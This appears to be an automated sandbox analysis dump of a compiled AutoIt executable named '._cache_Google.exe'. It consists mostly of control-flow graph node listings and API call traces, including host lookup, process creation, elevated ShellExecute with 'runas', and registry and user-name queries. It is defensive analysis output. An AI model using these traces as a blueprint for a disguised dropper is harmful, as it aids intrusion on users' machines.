109528->109512 109530 90a2fb 48 API calls 109529->109530 109530->109531 109531->109528 109556 95fc96 60 API calls 2 library calls 109531->109556 109533 95f616 109532->109533 109534 95f66b 109532->109534 109535 92010a 48 API calls 109533->109535 109538 960719 109534->109538 109536 95f638 109535->109536 109536->109534 109537 92010a 48 API calls 109536->109537 109537->109536 109539 960944 Mailbox 109538->109539 109542 96073c _strcat _wcscpy __NMSG_WRITE 109538->109542 109539->109499 109540 90d00b 58 API calls 109540->109542 109541 90cdb4 48 API calls 109541->109542 109542->109539 109542->109540 109542->109541 109543 9084a6 81 API calls 109542->109543 109544 9245ec 47 API calls __crtGetStringTypeA_stat 109542->109544 109557 948932 50 API calls __NMSG_WRITE 109542->109557 109543->109542 109544->109542 109548 91f941 109546->109548 109547 91f9d9 select 109549 91f9a7 109547->109549 109548->109547 109548->109549 109549->109502 109549->109503 109550->109512 109551->109512 109552->109507 109553->109518 109554->109491 109555->109518 109556->109528 109557->109542 109559 956b25 GetWindowRect 109558->109559 109560 956b42 109558->109560 109561 956b5c 109559->109561 109560->109561 109562 956b52 ClientToScreen 109560->109562 109561->108002 109561->108005 109562->109561 109563->108008 109564->108012 109566 9623eb _memset 109565->109566 109567 962452 109566->109567 109568 962428 109566->109568 109570 90cdb4 48 API calls 109567->109570 109574 962476 109567->109574 109569 90cdb4 48 API calls 109568->109569 109571 962433 109569->109571 109573 962448 109570->109573 109571->109574 109577 90cdb4 48 API calls 109571->109577 109572 9624b0 109576 9084a6 81 API calls 109572->109576 109579 90cdb4 48 API calls 109573->109579 109574->109572 109575 90cdb4 48 API calls 109574->109575 109575->109572 109578 9624d4 109576->109578 109577->109573 109580 903bcf 48 API calls 109578->109580 109579->109574 109581 9624de 109580->109581 109582 9625a1 109581->109582 109583 9624e8 109581->109583 109584 9625d3 GetCurrentDirectoryW 109582->109584 109586 9084a6 81 API calls 109582->109586 109585 9084a6 81 API calls 109583->109585 109587 92010a 48 API calls 109584->109587 109588 9624f9 109585->109588 109589 9625b8 109586->109589 109590 9625f8 GetCurrentDirectoryW 109587->109590 109591 903bcf 48 API calls 109588->109591 109592 903bcf 48 API calls 109589->109592 109593 962605 109590->109593 109594 962503 109591->109594 109595 9625c2 __NMSG_WRITE 109592->109595 109598 90ca8e 48 API calls 109593->109598 109604 96263e 109593->109604 109596 9084a6 81 API calls 109594->109596 109595->109584 109595->109604 109597 962514 109596->109597 109599 903bcf 48 API calls 109597->109599 109600 96261e 109598->109600 109601 96251e 109599->109601 109602 90ca8e 48 API calls 109600->109602 109603 9084a6 81 API calls 109601->109603 109606 96262e 109602->109606 109607 96252f 109603->109607 109605 96268a 109604->109605 109643 94a17a 8 API calls 109604->109643 109609 9626c1 109605->109609 109610 96274c CreateProcessW 109605->109610 109611 90ca8e 48 API calls 109606->109611 109612 903bcf 48 API calls 109607->109612 109646 93bc90 71 API calls 109609->109646 109624 96276b 109610->109624 109611->109604 109615 962539 109612->109615 109613 962655 109644 94a073 8 API calls 109613->109644 109617 96256f GetSystemDirectoryW 109615->109617 109619 9084a6 81 API calls 109615->109619 109621 92010a 48 API calls 109617->109621 109618 962670 109645 94a102 8 API calls 109618->109645 109623 962550 109619->109623 109622 962594 GetSystemDirectoryW 109621->109622 109622->109593 109625 903bcf 48 API calls 109623->109625 109627 962780 109624->109627 109628 9627bd CloseHandle 109624->109628 109626 96255a __NMSG_WRITE 109625->109626 109626->109593 109626->109617 109632 962791 GetLastError 109627->109632 109629 9627cb 109628->109629 109635 9627f5 109628->109635 109647 949d09 CloseHandle Mailbox 109629->109647 109631 9627fb 109634 9627a5 109631->109634 109632->109634 109648 949b29 CloseHandle 109634->109648 109635->109631 109638 962827 CloseHandle 109635->109638 109638->109634 109639 961f2b 109639->107618 109642 9626df __NMSG_WRITE 109642->109624 109643->109613 109644->109618 109645->109605 109646->109642 109648->109639 109649->108020 109650->108030 109651->108042 109652->108052 109653->108049 109655 9080f9 109654->109655 109656 90816b 109654->109656 109655->109656 109658 908105 109655->109658 109657 90a2fb 48 API calls 109656->109657 109665 90813a _memmove 109657->109665 109659 908110 109658->109659 109660 908163 109658->109660 109662 90a6f8 48 API calls 109659->109662 109678 907eda 48 API calls 109660->109678 109663 90811a 109662->109663 109664 92010a 48 API calls 109663->109664 109664->109665 109665->108123 109666->108123 109668 92010a 48 API calls 109667->109668 109669 90818f 109668->109669 109669->108123 109670->108123 109671->108113 109672->108113 109673->108123 109674->108131 109675->108132 109676->108091 109677->108115 109678->109665 109679->108149 109680->108151 109681->108169 109682 911118 109683 91e016 50 API calls 109682->109683 109684 91112e 109683->109684 109685 911148 109684->109685 109686 97abeb 109684->109686 109688 913680 420 API calls 109685->109688 109753 91cf79 49 API calls 109686->109753 109713 90fad8 Mailbox _memmove 109688->109713 109690 97ac2a 109693 97ac4a Mailbox 109690->109693 109754 94ba5d 48 API calls 109690->109754 109691 97b628 Mailbox 109757 94d520 86 API calls 4 library calls 109693->109757 109695 92010a 48 API calls 109695->109713 109696 910119 109760 94d520 86 API calls 4 library calls 109696->109760 109698 91105e 109704 90c935 48 API calls 109698->109704 109699 910dee 109702 90d89e 50 API calls 109699->109702 109701 910dfa 109706 90d89e 50 API calls 109701->109706 109702->109701 109703 97b772 109761 94d520 86 API calls 4 library calls 109703->109761 109714 90fbf1 Mailbox 109704->109714 109705 911063 109759 94d520 86 API calls 4 library calls 109705->109759 109710 910e83 109706->109710 109707 90f6d0 420 API calls 109707->109713 109709 90c935 48 API calls 109709->109713 109716 90caee 48 API calls 109710->109716 109711 93a599 InterlockedDecrement 109711->109713 109712 90d3d2 48 API calls 109712->109713 109713->109695 109713->109696 109713->109698 109713->109699 109713->109701 109713->109703 109713->109705 109713->109707 109713->109709 109713->109710 109713->109711 109713->109712 109713->109714 109717 921b2a 52 API calls __cinit 109713->109717 109722 911230 109713->109722 109723 90fa40 420 API calls 109713->109723 109726 97b583 109713->109726 109728 9110f1 Mailbox 109713->109728 109729 95013f 87 API calls 109713->109729 109730 960bfa 129 API calls 109713->109730 109731 91f03e 2 API calls 109713->109731 109732 961f19 134 API calls 109713->109732 109733 958065 55 API calls 109713->109733 109734 91f461 98 API calls 109713->109734 109735 9610e5 82 API calls 109713->109735 109736 9050a3 49 API calls 109713->109736 109737 91dd84 3 API calls 109713->109737 109738 9592c0 88 API calls 109713->109738 109739 9081c6 85 API calls 109713->109739 109740 959122 91 API calls 109713->109740 109741 96804e 113 API calls 109713->109741 109742 95936f 56 API calls 109713->109742 109743 9630ad 93 API calls 109713->109743 109744 96798d 109 API calls 109713->109744 109745 9617aa 87 API calls 109713->109745 109746 91ef0d 94 API calls 109713->109746 109747 95b74b 420 API calls 109713->109747 109748 911620 59 API calls Mailbox 109713->109748 109749 95ee52 82 API calls 2 library calls 109713->109749 109750 95ef9d 90 API calls Mailbox 109713->109750 109751 94b020 48 API calls 109713->109751 109752 95e713 420 API calls Mailbox 109713->109752 109716->109728 109717->109713 109718 97b7d2 109722->109714 109758 94d520 86 API calls 4 library calls 109722->109758 109723->109713 109755 94d520 86 API calls 4 library calls 109726->109755 109756 94d520 86 API calls 4 library calls 109728->109756 109729->109713 109730->109713 109731->109713 109732->109713 109733->109713 109734->109713 109735->109713 109736->109713 109737->109713 109738->109713 109739->109713 109740->109713 109741->109713 109742->109713 109743->109713 109744->109713 109745->109713 109746->109713 109747->109713 109748->109713 109749->109713 109750->109713 109751->109713 109752->109713 109753->109690 109754->109693 109755->109728 109756->109714 109757->109691 109758->109705 109759->109696 109760->109703 109761->109718 109762 974ddc 109763 974de6 VariantClear 109762->109763 109764 914472 109762->109764 109763->109764 109765 971edb 109770 90131c 109765->109770 109771 90133e 109770->109771 109804 901624 109771->109804 109776 90d3d2 48 API calls 109777 90137e 109776->109777 109778 90d3d2 48 API calls 109777->109778 109779 901388 109778->109779 109780 90d3d2 48 API calls 109779->109780 109781 901392 109780->109781 109782 90d3d2 48 API calls 109781->109782 109783 9013d8 109782->109783 109784 90d3d2 48 API calls 109783->109784 109785 9014bb 109784->109785 109812 901673 109785->109812 109850 9017e0 109804->109850 109807 907e53 48 API calls 109808 901344 109807->109808 109809 9016db 109808->109809 109864 901867 6 API calls 109809->109864 109811 901374 109811->109776 109813 90d3d2 48 API calls 109812->109813 109814 901683 109813->109814 109815 90d3d2 48 API calls 109814->109815 109816 90168b 109815->109816 109865 907d70 109816->109865 109857 9017fc 109850->109857 109853 9017fc 48 API calls 109854 9017f0 109853->109854 109855 90d3d2 48 API calls 109854->109855 109856 90165b 109855->109856 109856->109807 109858 90d3d2 48 API calls 109857->109858 109859 901807 109858->109859 109860 90d3d2 48 API calls 109859->109860 109861 90180f 109860->109861 109862 90d3d2 48 API calls 109861->109862 109863 9017e8 109862->109863 109863->109853 109864->109811 109866 90d3d2 48 API calls 109865->109866 109867 907d79 109866->109867 109872 97c05b 109873 97c05d 109872->109873 109876 9478ee WSAStartup 109873->109876 109875 97c066 109877 947917 gethostname gethostbyname 109876->109877 109879 9479b1 _wcscpy 109876->109879 109877->109879 109880 94793a _memmove 109877->109880 109878 947952 _wcscpy 109882 9479a9 WSACleanup 109878->109882 109879->109875 109880->109878 109881 947970 inet_ntoa 109880->109881 109883 947989 _strcat 109881->109883 109882->109879 109885 948553 109883->109885 109886 948565 _strlen 109885->109886 109887 948561 109885->109887 109888 948574 MultiByteToWideChar 109886->109888 109887->109878 109888->109887 109889 94858a 109888->109889 109890 92010a 48 API calls 109889->109890 109891 9485a6 MultiByteToWideChar 109890->109891 109891->109887 109892 97c146 GetUserNameW 109893 926a80 109894 926a8c _fprintf 109893->109894 109930 928b7b GetStartupInfoW 109894->109930 109896 926a91 109932 92a937 GetProcessHeap 109896->109932 109898 926ae9 109899 926af4 109898->109899 110017 926bd0 47 API calls 3 library calls 109898->110017 109933 9287d7 109899->109933 109902 926afa 109903 926b05 __RTC_Initialize 109902->109903 110018 926bd0 47 API calls 3 library calls 109902->110018 109954 92ba66 109903->109954 109906 926b14 109907 926b20 GetCommandLineW 109906->109907 110019 926bd0 47 API calls 3 library calls 109906->110019 109973 933c2d GetEnvironmentStringsW 109907->109973 109910 926b1f 109910->109907 109914 926b45 109986 933a64 109914->109986 109917 926b4b 109918 926b56 109917->109918 110021 921d7b 47 API calls 3 library calls 109917->110021 110000 921db5 109918->110000 109931 928b91 109930->109931 109931->109896 109932->109898 110025 921e5a 30 API calls 2 library calls 109933->110025 109935 9287dc 110026 928ab3 InitializeCriticalSectionAndSpinCount 109935->110026 109937 9287e1 109938 9287e5 109937->109938 110028 928afd TlsAlloc 109937->110028 110027 92884d 50 API calls 2 library calls 109938->110027 109941 9287ea 109941->109902 109942 9287f7 109942->109938 109943 928802 109942->109943 110029 927616 109943->110029 109946 928844 110037 92884d 50 API calls 2 library calls 109946->110037 109949 928849 109949->109902 109950 928823 109950->109946 109951 928829 109950->109951 110036 928724 47 API calls 4 library calls 109951->110036 109953 928831 GetCurrentThreadId 109953->109902 109955 92ba72 _fprintf 109954->109955 110046 928984 109955->110046 109957 92ba79 109958 927616 __calloc_crt 47 API calls 109957->109958 109959 92ba8a 109958->109959 109960 92baf5 GetStartupInfoW 109959->109960 109962 92ba95 @_EH4_CallFilterFunc@8 _fprintf 109959->109962 109968 92bc33 109960->109968 109969 92bb0a 109960->109969 109961 92bcf7 110053 92bd0b LeaveCriticalSection _doexit 109961->110053 109962->109906 109964 92bc7c GetStdHandle 109964->109968 109965 927616 __calloc_crt 47 API calls 109965->109969 109966 92bc8e GetFileType 109966->109968 109967 92bb58 109967->109968 109971 92bb8a GetFileType 109967->109971 109972 92bb98 InitializeCriticalSectionAndSpinCount 109967->109972 109968->109961 109968->109964 109968->109966 109970 92bcbb InitializeCriticalSectionAndSpinCount 109968->109970 109969->109965 109969->109967 109969->109968 109970->109968 109971->109967 109971->109972 109972->109967 109974 926b30 109973->109974 109975 933c3e 109973->109975 109980 93382b GetModuleFileNameW 109974->109980 110092 927660 47 API calls __crtGetStringTypeA_stat 109975->110092 109978 933c64 _memmove 109979 933c7a FreeEnvironmentStringsW 109978->109979 109979->109974 109981 93385f _wparse_cmdline 109980->109981 109982 926b3a 109981->109982 109983 933899 109981->109983 109982->109914 110020 921d7b 47 API calls 3 library calls 109982->110020 110093 927660 47 API calls __crtGetStringTypeA_stat 109983->110093 109985 93389f _wparse_cmdline 109985->109982 109987 933a7d __NMSG_WRITE 109986->109987 109988 933a75 109986->109988 109989 927616 __calloc_crt 47 API calls 109987->109989 109988->109917 109992 933aa6 __NMSG_WRITE 109989->109992 109990 933afd 109992->109988 109992->109990 109993 927616 __calloc_crt 47 API calls 109992->109993 109994 933b22 109992->109994 109997 933b39 109992->109997 110094 933317 47 API calls __cftoa_l 109992->110094 109993->109992 110017->109899 110018->109903 110019->109910 110025->109935 110026->109937 110027->109941 110028->109942 110031 92761d 110029->110031 110032 92765a 110031->110032 110033 92763b Sleep 110031->110033 110038 933e5a 110031->110038 110032->109946 110035 928b59 TlsSetValue 110032->110035 110034 927652 110033->110034 110034->110031 110034->110032 110035->109950 110036->109953 110037->109949 110039 933e65 110038->110039 110044 933e80 __calloc_impl 110038->110044 110040 933e71 110039->110040 110039->110044 110045 92889e 47 API calls __getptd_noexit 110040->110045 110042 933e90 RtlAllocateHeap 110043 933e76 110042->110043 110042->110044 110043->110031 110044->110042 110044->110043 110045->110043 110047 928995 110046->110047 110048 9289a8 EnterCriticalSection 110046->110048 110054 928a0c 110047->110054 110048->109957 110050 92899b 110050->110048 110078 921d7b 47 API calls 3 library calls 110050->110078 110053->109962 110055 928a18 _fprintf 110054->110055 110056 928a21 110055->110056 110057 928a39 110055->110057 110079 928e52 47 API calls __NMSG_WRITE 110056->110079 110062 928aa1 _fprintf 110057->110062 110072 928a37 110057->110072 110059 928a26 110080 928eb2 47 API calls 5 library calls 110059->110080 110062->110050 110063 928a4d 110064 928a63 110063->110064 110065 928a54 110063->110065 110068 928984 __lock 46 API calls 110064->110068 110083 92889e 47 API calls __getptd_noexit 110065->110083 110066 928a2d 110081 921d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 110066->110081 110071 928a6a 110068->110071 110070 928a59 110070->110062 110073 928a79 InitializeCriticalSectionAndSpinCount 110071->110073 110074 928a8e 110071->110074 110072->110057 110082 927660 47 API calls __crtGetStringTypeA_stat 110072->110082 110075 928a94 110073->110075 110084 9228ca 110074->110084 110090 928aaa LeaveCriticalSection _doexit 110075->110090 110079->110059 110080->110066 110082->110063 110083->110070 110085 9228d3 RtlFreeHeap 110084->110085 110089 9228fc __dosmaperr 110084->110089 110086 9228e8 110085->110086 110085->110089 110091 92889e 47 API calls __getptd_noexit 110086->110091 110088 9228ee GetLastError 110088->110089 110089->110075 110090->110062 110091->110088 110092->109978 110093->109985 110094->109992 110934 97bc25 110935 97bc27 110934->110935 110938 9479f8 SHGetFolderPathW 110935->110938 110937 97bc30 110937->110937 110939 907e53 48 API calls 110938->110939 110940 947a25 110939->110940 110940->110937 110941 9029c2 110942 9029cb 110941->110942 110943 902a48 110942->110943 110944 9029e9 110942->110944 110982 902a46 110942->110982 110946 972307 110943->110946 110947 902a4e 110943->110947 110948 9029f6 110944->110948 110949 902aac PostQuitMessage 110944->110949 110945 902a2b DefWindowProcW 110975 902a39 110945->110975 110996 90322e 16 API calls 110946->110996 110950 902a53 110947->110950 110951 902a76 SetTimer RegisterWindowMessageW 110947->110951 110953 902a01 110948->110953 110954 97238f 110948->110954 110949->110975 110955 902a5a KillTimer 110950->110955 110956 9722aa 110950->110956 110958 902a9f CreatePopupMenu 110951->110958 110951->110975 110959 902ab6 110953->110959 110960 902a09 110953->110960 111002 9457fb 60 API calls _memset 110954->111002 110993 902b94 Shell_NotifyIconW _memset 110955->110993 110962 9722e3 MoveWindow 110956->110962 110963 9722af 110956->110963 110957 97232e 110997 91ec33 420 API calls Mailbox 110957->110997 110958->110975 110986 901e58 110959->110986 110966 972374 110960->110966 110967 902a14 110960->110967 110962->110975 110970 9722b3 110963->110970 110971 9722d2 SetFocus 110963->110971 110966->110945 111001 93b31f 48 API calls 110966->111001 110973 902a1f 110967->110973 110974 97235f 110967->110974 110968 9723a1 110968->110945 110968->110975 110970->110973 110976 9722bc 110970->110976 110971->110975 110972 902a6d 110994 902ac7 DeleteObject DestroyWindow Mailbox 110972->110994 110973->110945 110998 902b94 Shell_NotifyIconW _memset 110973->110998 111000 945fdb 70 API calls _memset 110974->111000 110995 90322e 16 API calls 110976->110995 110981 97236f 110981->110975 110982->110945 110984 972353 110999 903598 67 API calls _memset 110984->110999 110987 901ef1 110986->110987 110988 901e6f _memset 110986->110988 110987->110975 111003 9038e4 110988->111003 110990 901eda KillTimer SetTimer 110990->110987 110991 901e96 110991->110990 110992 974518 Shell_NotifyIconW 110991->110992 110992->110990 110993->110972 110994->110975 110995->110975 110996->110957 110997->110973 110998->110984 110999->110982 111000->110981 111001->110982 111002->110968 111004 903900 111003->111004 111024 9039d5 Mailbox 111003->111024 111005 907b6e 48 API calls 111004->111005 111006 90390e 111005->111006 111007 97453f LoadStringW 111006->111007 111008 90391b 111006->111008 111011 974559 111007->111011 111009 907e53 48 API calls 111008->111009 111010 903930 111009->111010 111010->111011 111012 903941 111010->111012 111026 9039e8 48 API calls 2 library calls 111011->111026 111014 9039da 111012->111014 111015 90394b 111012->111015 111018 90c935 48 API calls 111014->111018 111025 9039e8 48 API calls 2 library calls 111015->111025 111016 974564 111019 974578 111016->111019 111021 903956 _memset _wcscpy 111016->111021 111018->111021 111027 9039e8 48 API calls 2 library calls 111019->111027 111023 9039ba Shell_NotifyIconW 111021->111023 111022 974586 111023->111024 111024->110991 111025->111021 111026->111016 111027->111022 111028 90e849 111031 9126c0 111028->111031 111030 90e852 111032 97862d 111031->111032 111033 91273b 111031->111033 111153 94d520 86 API calls 4 library calls 111032->111153 111038 912adc 111033->111038 111039 91277c 111033->111039 111052 91279a 111033->111052 111035 912a84 111046 90d380 55 API calls 111035->111046 111036 9127cf 111037 97863e 111036->111037 111040 9127db 111036->111040 111154 94d520 86 API calls 4 library calls 111037->111154 111152 90d349 53 API calls 111038->111152 111084 9128f6 111039->111084 111148 90d500 53 API calls __cinit 111039->111148 111042 9127ef 111040->111042 111057 97865a 111040->111057 111045 912806 111042->111045 111049 9786c9 111042->111049 111047 90fa40 420 API calls 111045->111047 111048 912aab 111046->111048 111089 91281d 111047->111089 111054 90d2d2 53 API calls 111048->111054 111050 978ac9 111049->111050 111051 90fa40 420 API calls 111049->111051 111169 94d520 86 API calls 4 library calls 111050->111169 111055 9786ee 111051->111055 111052->111035 111052->111036 111060 912914 111052->111060 111054->111060 111062 90d89e 50 API calls 111055->111062 111068 97870a 111055->111068 111072 9129ec 111055->111072 111057->111049 111057->111072 111155 95f211 420 API calls 111057->111155 111156 95f4df 420 API calls 111057->111156 111058 978980 111164 94d520 86 API calls 4 library calls 111058->111164 111063 90cdb4 48 API calls 111060->111063 111061 912836 111061->111050 111066 90fa40 420 API calls 111061->111066 111062->111068 111070 91296e 111063->111070 111065 9128cc 111065->111084 111149 90cf97 58 API calls 111065->111149 111090 91287c 111066->111090 111067 90c935 48 API calls 111067->111061 111074 97878d 111068->111074 111157 90346e 48 API calls 111068->111157 111070->111072 111079 912984 111070->111079 111080 978a97 111070->111080 111087 9789b4 111070->111087 111071 9128ac 111071->111065 111162 90cf97 58 API calls 111071->111162 111072->111030 111075 97883f 111074->111075 111078 97882d 111074->111078 111158 944e71 53 API calls __cinit 111074->111158 111160 95c235 420 API calls Mailbox 111075->111160 111081 90ca8e 48 API calls 111078->111081 111079->111080 111150 9141fc 84 API calls 111079->111150 111080->111072 111168 904b02 50 API calls 111080->111168 111081->111075 111082 978888 111088 97888c 111082->111088 111082->111089 111085 912900 111084->111085 111163 90cf97 58 API calls 111084->111163 111085->111058 111085->111060 111134 95bf80 111087->111134 111161 94d520 86 API calls 4 library calls 111088->111161 111089->111061 111089->111067 111089->111072 111090->111071 111090->111072 111095 90fa40 420 API calls 111090->111095 111093 9129b8 111096 978a7e 111093->111096 111151 9141fc 84 API calls 111093->111151 111100 9788ff 111095->111100 111167 91ee93 84 API calls 111096->111167 111097 978725 111097->111078 111109 9114a0 48 API calls 111097->111109 111100->111072 111108 90d89e 50 API calls 111100->111108 111102 9789f3 111115 978a42 111102->111115 111116 978a01 111102->111116 111103 9787ca 111104 978813 111103->111104 111107 9084a6 81 API calls 111103->111107 111106 90d89e 50 API calls 111104->111106 111105 9129ca 111105->111072 111111 9129e5 111105->111111 111112 978a6f 111105->111112 111110 978821 111106->111110 111123 9787e0 111107->111123 111108->111071 111113 97875d 111109->111113 111114 90d89e 50 API calls 111110->111114 111117 92010a 48 API calls 111111->111117 111166 95d1da 50 API calls 111112->111166 111113->111078 111121 9114a0 48 API calls 111113->111121 111114->111078 111119 90d89e 50 API calls 111115->111119 111118 90ca8e 48 API calls 111116->111118 111117->111072 111118->111072 111122 978a4b 111119->111122 111124 978775 111121->111124 111125 90d89e 50 API calls 111122->111125 111123->111104 111159 94a76d 49 API calls 111123->111159 111127 90d89e 50 API calls 111124->111127 111128 978a57 111125->111128 111131 978781 111127->111131 111165 904b02 50 API calls 111128->111165 111129 978807 111130 90d89e 50 API calls 111129->111130 111130->111104 111133 90d89e 50 API calls 111131->111133 111133->111074 111140 95bfd9 _memset 111134->111140 111136 95c22e 111136->111102 111137 95c14c 111138 95c19f VariantInit VariantClear 111137->111138 111145 95c033 111137->111145 111139 95c1c5 111138->111139 111143 95c1e6 111139->111143 111139->111145 111140->111137 111141 95c097 VariantInit 111140->111141 111140->111145 111146 95c0d6 111141->111146 111171 94a6f6 103 API calls 111143->111171 111144 95c20d VariantClear 111144->111136 111172 95c235 420 API calls Mailbox 111145->111172 111146->111145 111170 94a6f6 103 API calls 111146->111170 111148->111052 111149->111084 111150->111093 111151->111105 111152->111071 111153->111037 111154->111057 111155->111057 111156->111057 111157->111097 111158->111103 111159->111129 111160->111082 111161->111072 111162->111065 111163->111085 111164->111072 111165->111072 111166->111096 111167->111080 111168->111050 111169->111072 111170->111137 111171->111144 111172->111136 111173 971eed 111178 91e975 111173->111178 111175 971f01 111194 921b2a 52 API calls __cinit 111175->111194 111177 971f0b 111179 92010a 48 API calls 111178->111179 111180 91ea27 GetModuleFileNameW 111179->111180 111181 92297d __wsplitpath 47 API calls 111180->111181 111182 91ea5b _wcsncat 111181->111182 111195 922bff 111182->111195 111185 92010a 48 API calls 111186 91ea94 _wcscpy 111185->111186 111187 90d3d2 48 API calls 111186->111187 111188 91eacf 111187->111188 111198 91eb05 111188->111198 111190 91eae0 Mailbox 111190->111175 111191 90a4f6 48 API calls 111192 91eada _wcscat __NMSG_WRITE _wcsncpy 111191->111192 111192->111190 111192->111191 111193 92010a 48 API calls 111192->111193 111193->111192 111194->111177 111212 92aab9 111195->111212 111199 90c4cd 48 API calls 111198->111199 111200 91eb14 RegOpenKeyExW 111199->111200 111201 974b17 RegQueryValueExW 111200->111201 111202 91eb35 111200->111202 111203 974b91 RegCloseKey 111201->111203 111204 974b30 111201->111204 111202->111192 111205 92010a 48 API calls 111204->111205 111206 974b49 111205->111206 111207 904bce 48 API calls 111206->111207 111208 974b53 RegQueryValueExW 111207->111208 111209 974b6f 111208->111209 111210 974b86 111208->111210 111211 907e53 48 API calls 111209->111211 111210->111203 111211->111210 111213 92abc6 111212->111213 111214 92aaca 111212->111214 111222 92889e 47 API calls __getptd_noexit 111213->111222 111214->111213 111220 92aad5 111214->111220 111216 92abbb 111223 927aa0 8 API calls __cftoa_l 111216->111223 111218 91ea8a 111218->111185 111220->111218 111221 92889e 47 API calls __getptd_noexit 111220->111221 111221->111216 111222->111216 111223->111218 111224 90e8eb 111225 912b40 420 API calls 111224->111225 111226 90e8f7 111225->111226 111227 971e8b 111232 91e44f 111227->111232 111231 971e9a 111233 92010a 48 API calls 111232->111233 111234 91e457 111233->111234 111236 91e46b 111234->111236 111240 91e74b 111234->111240 111239 921b2a 52 API calls __cinit 111236->111239 111239->111231 111241 91e754 111240->111241 111242 91e463 111240->111242 111272 921b2a 52 API calls __cinit 111241->111272 111244 91e47b 111242->111244 111245 90d3d2 48 API calls 111244->111245 111246 91e492 GetVersionExW 111245->111246 111247 907e53 48 API calls 111246->111247 111248 91e4d5 111247->111248 111273 91e5f8 111248->111273 111251 91e617 48 API calls 111260 91e4e9 111251->111260 111254 9729f9 111255 91e576 111258 91e5ec GetSystemInfo 111255->111258 111259 91e59e 111255->111259 111256 91e55f GetCurrentProcess 111286 91e70e LoadLibraryA GetProcAddress 111256->111286 111261 91e5c9 111258->111261 111280 91e694 111259->111280 111260->111254 111277 91e6d1 111260->111277 111263 91e5d7 FreeLibrary 111261->111263 111264 91e5dc 111261->111264 111263->111264 111264->111236 111266 91e5e4 GetSystemInfo 111268 91e5be 111266->111268 111267 91e5b4 111283 91e437 111267->111283 111268->111261 111270 91e5c4 FreeLibrary 111268->111270 111270->111261 111272->111242 111274 91e601 111273->111274 111275 90a2fb 48 API calls 111274->111275 111276 91e4dd 111275->111276 111276->111251 111287 91e6e3 111277->111287 111291 91e6a6 111280->111291 111284 91e694 2 API calls 111283->111284 111285 91e43f GetNativeSystemInfo 111284->111285 111285->111268 111286->111255 111288 91e55b 111287->111288 111289 91e6ec LoadLibraryA 111287->111289 111288->111255 111288->111256 111289->111288 111290 91e6fd GetProcAddress 111289->111290 111290->111288 111292 91e5ac 111291->111292 111293 91e6af LoadLibraryA 111291->111293 111292->111266 111292->111267 111293->111292 111294 91e6c0 GetProcAddress 111293->111294 111294->111292 111295 971eca 111300 91be17 111295->111300 111299 971ed9 111301 90d3d2 48 API calls 111300->111301 111302 91be85 111301->111302 111308 91c929 111302->111308 111305 91bf22 111306 91bf3e 111305->111306 111311 91c8b7 48 API calls _memmove 111305->111311 111307 921b2a 52 API calls __cinit 111306->111307 111307->111299 111312 91c955 111308->111312 111311->111305 111313 91c948 111312->111313 111314 91c962 111312->111314 111313->111305 111314->111313 111315 91c969 RegOpenKeyExW 111314->111315 111315->111313 111316 91c983 RegQueryValueExW 111315->111316 111317 91c9b9 RegCloseKey 111316->111317 111318 91c9a4 111316->111318 111317->111313 111318->111317

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Function 0090374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0090376D
                                                                                                                                                                                        • Part of subcall function 00904257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,00000000,00000001,00000000), ref: 0090428C
                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?), ref: 0090377F
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,009C1120,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,009C1124,?,?), ref: 009037EE
                                                                                                                                                                                        • Part of subcall function 009034F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0090352A
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00903860
                                                                                                                                                                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,009B2934,00000010), ref: 009721C5
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?), ref: 009721FD
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00972232
                                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0099DAA4), ref: 00972290
                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000), ref: 00972297
                                                                                                                                                                                        • Part of subcall function 009030A5: GetSysColorBrush.USER32(0000000F), ref: 009030B0
                                                                                                                                                                                        • Part of subcall function 009030A5: LoadCursorW.USER32(00000000,00007F00), ref: 009030BF
                                                                                                                                                                                        • Part of subcall function 009030A5: LoadIconW.USER32(00000063), ref: 009030D5
                                                                                                                                                                                        • Part of subcall function 009030A5: LoadIconW.USER32(000000A4), ref: 009030E7
                                                                                                                                                                                        • Part of subcall function 009030A5: LoadIconW.USER32(000000A2), ref: 009030F9
                                                                                                                                                                                        • Part of subcall function 009030A5: RegisterClassExW.USER32(?), ref: 00903167
                                                                                                                                                                                        • Part of subcall function 00902E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00902ECB
                                                                                                                                                                                        • Part of subcall function 00902E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00902EEC
                                                                                                                                                                                        • Part of subcall function 00902E9D: ShowWindow.USER32(00000000), ref: 00902F00
                                                                                                                                                                                        • Part of subcall function 00902E9D: ShowWindow.USER32(00000000), ref: 00902F09
                                                                                                                                                                                        • Part of subcall function 00903598: _memset.LIBCMT ref: 009035BE
                                                                                                                                                                                        • Part of subcall function 00903598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00903667
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
